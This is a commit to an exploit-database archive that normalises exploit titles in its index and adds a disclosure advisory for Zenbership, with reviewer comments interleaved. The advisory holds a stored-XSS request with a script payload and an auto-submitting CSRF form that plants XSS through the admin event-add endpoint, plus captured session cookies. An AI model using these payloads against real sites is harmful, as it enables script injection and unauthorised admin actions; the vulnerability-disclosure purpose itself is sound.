DB: 2016-10-24
1 new exploits dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock) dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock) Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC) Microsoft Excel 2010 - Crash PoC (2) Microsoft Excel 2010 - Crash (PoC) (2) Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit) Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit) The Unarchiver 3.11.1 - '.tar.Z' Crash PoC The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC) Microsoft Edge - Function.apply Infomation Leak (MS16-119) Microsoft Edge - 'Function.apply' Information Leak (MS16-119) Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit) Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit) Zenbership 107 - Multiple Vulnerabilities
This commit is contained in:
parent
6cd9390ff2
commit
e380b207ce
2 changed files with 191 additions and 7 deletions
15
files.csv
15
files.csv
|
@ -33425,7 +33425,7 @@ id,file,description,date,author,platform,type,port
|
|||
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
|
||||
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900
|
||||
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
|
||||
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
|
||||
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
|
@ -35840,7 +35840,7 @@ id,file,description,date,author,platform,type,port
|
|||
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
|
||||
39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0
|
||||
39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
|
||||
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
|
||||
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos,0
|
||||
39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
|
||||
39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
|
||||
|
@ -36123,7 +36123,7 @@ id,file,description,date,author,platform,type,port
|
|||
39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
|
||||
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0
|
||||
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
|
||||
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC (2)",2016-05-16,HauntIT,windows,dos,0
|
||||
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos,0
|
||||
39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
|
||||
39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
|
||||
39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0
|
||||
|
@ -36569,7 +36569,7 @@ id,file,description,date,author,platform,type,port
|
|||
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
|
||||
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
|
||||
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
|
||||
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
|
||||
40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
|
||||
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
|
||||
40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
|
||||
|
@ -36675,7 +36675,7 @@ id,file,description,date,author,platform,type,port
|
|||
40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
|
||||
40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
|
||||
40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
|
||||
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
|
||||
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos,0
|
||||
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
|
||||
40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
|
||||
40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
|
||||
|
@ -36706,12 +36706,12 @@ id,file,description,date,author,platform,type,port
|
|||
40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40603,platforms/windows/dos/40603.html,"Microsoft Edge - 'Function.apply' Information Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
|
||||
40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
|
||||
40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
|
||||
40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
|
||||
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
|
||||
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
|
||||
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
|
||||
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
|
||||
40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
|
||||
|
@ -36720,3 +36720,4 @@ id,file,description,date,author,platform,type,port
|
|||
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
|
||||
40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
|
||||
40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
|
||||
40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0
|
||||
|
|
|
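Review bot: The new entry in the last hunk, `40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",...`, assigns a version "107" that the advisory added by this same commit never states — its title and its "Versions Affected" field both say only "latest version". If 107 is the build the submitter actually tested, the advisory text should carry it; otherwise the index title should not claim more precision than the file supports, e.g. `"Zenbership - Cross-Site Request Forgery / Persistent Cross-Site Scripting"`, which also names the two issues the advisory documents instead of the generic "Multiple Vulnerabilities". The other hunks only normalize existing titles and need no change.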
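--- a/platforms/php/webapps/40620.txt
+++ b/platforms/php/webapps/40620.txt
@@ -0,0 +1,183 @@
+1. ADVISORY INFORMATION
+========================================
+Title: Zenbership (latest version) - Multiple Vulnerabilities
+Application: Zenbership
+Class: Sensitive Information disclosure
+Versions Affected: <= latest version )
+Vendor URL: https://www.zenbership.com/
+Software URL: https://www.zenbership.com/Download
+Bugs: CSRF / Persistent Cross Site Scripting
+Date of found: 23.10.2016
+Author: Besim
+
+
+2.CREDIT
+========================================
+Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN
+
+
+3. VERSIONS AFFECTED
+========================================
+<= latest version
+
+
+
+4. TECHNICAL DETAILS & POC
+========================================
+
+
+PR1 - Stored Cross Site Scripting
+========================================
+
+1 ) Admin login admin panel
+2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
+3 ) Attacker enter xss payload to last name input
+4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
+5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>
+
+## HTTP Request ##
+
+POST /zenbership/pp-functions/form_process.php HTTP/1.1
+Host: site_name
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
+Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 153
+
+- POST DATA
+
+page=1
+&session=zen_0176e737b450bbd83f5fc1066
+&first_name=Besim
+&last_name=<Script>alert('ExploitDB')</Script>
+&email=exploit@yopmail.com
+
+
+PR2 - CSRF
+========================================
+
+1 ) Attacker can add new event with xss payload (stored)
+- File : admin/cp-functions/event-add.php
+
+HTTP Request and CSRF PoC
+=========================
+
+
+## HTTP Request ##
+
+POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
+Host: site_name
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://site_name/zenbership/admin/index.php?l=events
+Content-Length: 1206
+Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
+Connection: close
+
+
+- POST DATA
+
+
+id=JFW996951
+&ext=
+&edit=0
+&event[id]=JFW996951&event[status]=1
+&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
+&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
+&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
+&event[calendar_id]=1
+&event[custom_template]=
+&tags=
+&event[starts]=2016-10-26 00:00:00
+&event[ends]=2016-10-28 00:00:00
+&event[start_registrations]=2016-10-24 00:00:00
+&event[close_registration]=&event[early_bird_end]=
+&event[online]=0&event[location_name]=Turkey
+&event[url]=&event[address_line_1]=
+&event[address_line_2]=&event[city]=
+&event[state]=&event[zip]=
+&event[country]=
+&event[phone]=
+&limit_attendees_dud=0
+&event[max_rsvps]=
+&event[members_only_view]=0
+&event[members_only_rsvp]=0
+&event[allow_guests]=1
+&event[max_guests]=1
+&form[col2][Account Overview]=section
+&form[col2][company_name]=1
+&form[col2][address_line_1]=0
+&form[col2][address_line_2]=0
+&form[col2][city]=0
+&form[col2][state]=0
+&form[col2][zip]=0
+&form[col2][country]=0
+&form[col2][url]=0
+
+
+
+## CSRF PoC ##
+
+<html>
+<!-- CSRF PoC -->
+<body>
+<form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
+<input type="hidden" name="id" value="OXH978786" />
+<input type="hidden" name="ext" value="" />
+<input type="hidden" name="edit" value="0" />
+<input type="hidden" name="event[id]" value="OXH978786" />
+<input type="hidden" name="event[status]" value="1" />
+<input type="hidden" name="event[name]" value="<script>alert('Meryem-ExploitDB');</Script>" />
+<input type="hidden" name="event[tagline]" value="meryem" />
+<input type="hidden" name="event[description]" value="<p>Meryem AKDOGAN</p> " />
+<input type="hidden" name="event[post_rsvp_message]" value="<p>Meryem AKDOGAN</p> " />
+<input type="hidden" name="event[calendar_id]" value="1" />
+<input type="hidden" name="event[custom_template]" value="" />
+<input type="hidden" name="tags" value="meryem" />
+<input type="hidden" name="event[starts]" value="2016-10-26 00:00:00" />
+<input type="hidden" name="event[ends]" value="2016-10-28 00:00:00" />
+<input type="hidden" name="event[start_registrations]" value="2016-10-24 00:00:00" />
+<input type="hidden" name="event[close_registration]" value="" />
+<input type="hidden" name="event[early_bird_end]" value="" />
+<input type="hidden" name="event[online]" value="0" />
+<input type="hidden" name="event[location_name]" value="Turkey" />
+<input type="hidden" name="event[url]" value="" />
+<input type="hidden" name="event[address_line_1]" value="" />
+<input type="hidden" name="event[address_line_2]" value="" />
+<input type="hidden" name="event[city]" value="" />
+<input type="hidden" name="event[state]" value="" />
+<input type="hidden" name="event[zip]" value="" />
+<input type="hidden" name="event[country]" value="" />
+<input type="hidden" name="event[phone]" value="" />
+<input type="hidden" name="limit_attendees_dud" value="0" />
+<input type="hidden" name="event[max_rsvps]" value="" />
+<input type="hidden" name="event[members_only_view]" value="0" />
+<input type="hidden" name="event[members_only_rsvp]" value="0" />
+<input type="hidden" name="event[allow_guests]" value="1" />
+<input type="hidden" name="event[max_guests]" value="1" />
+<input type="hidden" name="form[col2][Account Overview]" value="section" />
+<input type="hidden" name="form[col2][company_name]" value="1" />
+<input type="hidden" name="form[col2][address_line_1]" value="0" />
+<input type="hidden" name="form[col2][address_line_2]" value="0" />
+<input type="hidden" name="form[col2][city]" value="0" />
+<input type="hidden" name="form[col2][state]" value="0" />
+<input type="hidden" name="form[col2][zip]" value="0" />
+<input type="hidden" name="form[col2][country]" value="0" />
+<input type="hidden" name="form[col2][url]" value="0" />
+<input type="submit" value="Submit request" />
+</form>
+<script>
+document.forms[0].submit();
+</script>
+</body>
+</html>
+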
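Review bot: The CSRF PoC at the end of the file does not reproduce the request it is based on: the captured event-add.php request carries `X-Requested-With: XMLHttpRequest`, a header a cross-site HTML form post cannot set, so the PoC only works if event-add.php does not check that header, and the advisory should state that it was confirmed to succeed without it. The captured POST body shows no anti-CSRF token, which is consistent with the claim, but this is never said; a line such as `Note: event-add.php accepts the request with no CSRF token and without the X-Requested-With header` under "PR2 - CSRF" would make the finding verifiable. Both captured requests also include live `PHPSESSID` and `zen_admin_ses` values from the test instance, which should be redacted before publication. Finally, the header's `Class: Sensitive Information disclosure` contradicts the `Bugs: CSRF / Persistent Cross Site Scripting` line, and the affected version is given only as "latest version" (with a stray `)`), which should be replaced by the version number actually tested.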